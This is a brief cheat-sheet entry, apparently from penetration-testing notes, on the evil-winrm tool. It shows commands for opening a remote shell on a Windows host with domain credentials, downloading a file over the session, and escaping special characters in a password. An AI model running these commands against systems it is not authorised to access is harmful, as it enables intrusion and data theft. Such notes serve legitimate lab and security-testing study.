evil-winrm
Getting a shell with valid domain user credentials. Also requires that the user is in the "BUILTIN\Remote Management Users" group.
evil-winrm -i 10.129.145.206 -u domain\\user -p password

Download a file over the remote managment session.
download ./file_on_windows_host.txt file_name_on_linux_host.txt

Escaping special characters on connection establishment.
evil-winrm -i 192.168.50.220 -u user1 -p "qwertqwertqwert123\!\!"
Last updated
Was this helpful?